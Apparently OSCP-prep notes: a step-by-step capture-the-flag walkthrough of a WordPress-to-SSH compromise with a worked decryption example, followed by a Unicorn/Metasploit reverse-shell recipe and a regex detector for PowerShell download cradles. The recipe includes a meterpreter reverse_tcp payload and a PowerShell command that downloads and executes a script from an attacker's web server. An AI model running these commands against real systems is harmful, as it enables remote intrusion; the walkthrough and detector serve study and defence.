- Nmap
- SSL Enum -> Add hostnames to /etc/hosts.
- WPScan -> authenticated SQL injection.
- WPScan enumerate users.
- Searchsploit -> Unauthenticated Admin access
- Use exploit html, edit URLs and exploit the vuln.
- Login as Admin
- Find user SMTP Password in Plugin.
- Setup SMTP Client and read emails.
- Credentials to Forum in Emails.
- Find encrypted Forum Entries.
- Decrypt Key with one time pad.
- Decrypt URL with recovered Key.
- Get URL for id_rsa file.
- Crack Password for file.
- Login with SSH.
- Find RSA encryption script.
- Google "Decrypt RSA with P Q A given", copy script from Stack Overflow.
- Decrypt and Convert Flag from Hex to Ascii.
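The two decryption steps in the list above (the one-time-pad step that recovers a key and then the URL, and the RSA step where p and q are already known) worked through on constructed toy values. This is an added example, not code from the original notes or the box; the pad, key, URL, primes and the "HTB" flag are all made up here, and the assumption that the URL is XORed with the recovered key is mine.

```python
# Added worked example (not from the original notes): the two decryption
# steps in the walkthrough, run on constructed toy values.
#
#  - "Decrypt key with one time pad" / "Decrypt URL with recovered key":
#    a one-time pad is a plain XOR with the pad; the recovered key is then
#    XORed over the URL ciphertext in the same way (assumed for the example).
#  - "Decrypt RSA with p, q given": with the factors known, the private
#    exponent is d = e^-1 mod (p-1)(q-1) and the plaintext is m = c^d mod n.
#    The flag comes out as an integer whose hex digits are ASCII bytes.

from itertools import cycle


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key if it is shorter than the data.
    With a true one-time pad the key is as long as the data and used once."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n); pow() with exponent -1 needs Python 3.8+."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def rsa_decrypt(c: int, p: int, q: int, e: int) -> int:
    """m = c^d mod n, only possible because p and q are known."""
    d = rsa_private_exponent(p, q, e)
    return pow(c, d, p * q)


def int_to_ascii(m: int) -> str:
    """Step 'Convert flag from hex to ASCII': hex(m) -> bytes -> text."""
    h = format(m, "x")
    if len(h) % 2:            # bytes.fromhex needs an even digit count
        h = "0" + h
    return bytes.fromhex(h).decode("ascii")


def demo() -> dict:
    """Round-trip both steps on constructed values and return the results."""
    # --- one-time pad: constructed pad, key and URL (not real values) ---
    pad = bytes.fromhex("3a7f10c9e2554b8d")       # 8-byte pad, used once
    key_ct = xor_with_key(b"S3cr3tK!", pad)        # ciphertext of the key
    recovered_key = xor_with_key(key_ct, pad)      # pad XOR ciphertext = key
    url_ct = xor_with_key(b"http://example.invalid/id_rsa", recovered_key)
    url = xor_with_key(url_ct, recovered_key).decode("ascii")

    # --- RSA: constructed small primes (far too small for real use) ---
    p, q, e = 10007, 10009, 65537
    n = p * q
    flag_int = int.from_bytes(b"HTB", "big")       # 0x485442, below n
    c = pow(flag_int, e, n)                        # what the script would find
    m = rsa_decrypt(c, p, q, e)

    return {
        "recovered_key": recovered_key,
        "url": url,
        "flag_int": m,
        "flag": int_to_ascii(m),
    }


if __name__ == "__main__":
    print(demo())
```

Running the file prints the recovered key, the URL and the flag. The RSA half is exactly what the Stack Overflow script in the step above does: the whole difficulty of RSA is factoring n, so once p and q are handed over, decryption is two lines of modular arithmetic.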
Takeaways
- Check the SSL certificate information in the browser for details such as email addresses, and add hostnames to /etc/hosts.
- Use a Burp Suite redirect proxy set on 127.0.0.1 to point to the remote host.
- Use devtools to uncover censored passwords.
Takeaways:
Use Unicorn to upgrade shells
unicorn windows/meterpreter/reverse_tcp $local_ip $local_port
This generates one .rc file for msf and one PowerShell script.
Start metasploit:
msfconsole -r unicorn.rc
Cut the PowerShell payload down to only the part in double quotes and save it as shell.html.
Start a local webserver to serve file.
python -m http.server 80
Execute in the Windows console:
powershell "IEX(New-Object Net.WebClient).downloadString('http://$IP/shell.html')"
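From the defender's side, the download cradle that ends this procedure is the part worth detecting: with PowerShell Script Block Logging enabled, the decoded script text lands in the Microsoft-Windows-PowerShell/Operational log as Event ID 4104, and the fetch-then-IEX shape stands out. The following is an added example, not part of the original notes or of the Unicorn project; the log entries, host names and addresses are constructed for the example.

```python
# Added example (defender's side, not from the original notes): flag
# PowerShell download cradles like the one used in this procedure,
#   IEX(New-Object Net.WebClient).downloadString('http://.../shell.html')
# in Script Block Logging output (Event ID 4104). The log entries below are
# constructed for the example; the addresses are documentation ranges.

import re

# Each indicator is one stage of the cradle: fetch, then execute in memory.
INDICATORS = {
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "download":  re.compile(r"\.Download(String|File|Data)\s*\(", re.I),
    "iex":       re.compile(r"\bIEX\b|\bInvoke-Expression\b", re.I),
    "ip_url":    re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}[/:]", re.I),
}

# Constructed 4104 script block texts as (host, script text) pairs.
SAMPLE_LOGS = [
    ("WS01", "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"),
    ("WS01", "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/shell.html')"),
    ("WS02", "$wc = New-Object Net.WebClient; $wc.DownloadFile('https://updates.example.invalid/x.msi', 'x.msi')"),
    ("WS03", "Invoke-Expression (Get-Content .\\build.ps1 -Raw)"),
    ("WS04", 'powershell -nop -w hidden -c "IEX (New-Object System.Net.WebClient).DownloadString(\'http://192.0.2.7:8080/a\')"'),
]


def matched_indicators(script_text: str) -> set:
    """Names of every indicator that fires on one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script_text)}


def is_download_cradle(script_text: str) -> bool:
    """Fetch plus in-memory execute in one script block is the cradle shape;
    either half alone (a plain DownloadFile, or IEX of a local file) is not,
    which keeps ordinary admin scripts out of the alert queue."""
    hits = matched_indicators(script_text)
    return "iex" in hits and ("download" in hits or "webclient" in hits)


def triage(logs):
    """Return (host, sorted indicator names) for each cradle-shaped block."""
    return [
        (host, sorted(matched_indicators(text)))
        for host, text in logs
        if is_download_cradle(text)
    ]


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_LOGS):
        print(f"{host}: download cradle ({', '.join(hits)})")
```

Only the two blocks that both fetch and execute are reported; the DownloadFile-only line and the Invoke-Expression of a local file are left alone. The `ip_url` indicator is informational rather than a trigger, because a cradle can just as easily point at a hostname. Plain regexes will not see through obfuscated variants (string concatenation, encoded commands), so this belongs alongside, not instead of, the 4104 logging itself.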
Thank you for your work, which is making the OSCP preparation an awesome experience.